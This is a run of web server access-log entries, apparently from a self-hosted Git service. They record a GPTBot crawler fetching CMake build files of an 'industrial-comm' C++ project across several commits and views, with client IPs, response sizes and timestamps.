"/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10239] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10024] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10270] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10297] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10239] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10360] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11653] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11651] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11652] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16054] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16056] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11654] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16054] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16055] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16058] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11654] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11729] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10675] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14921] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14920] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10673] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10672] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10674] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14918] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 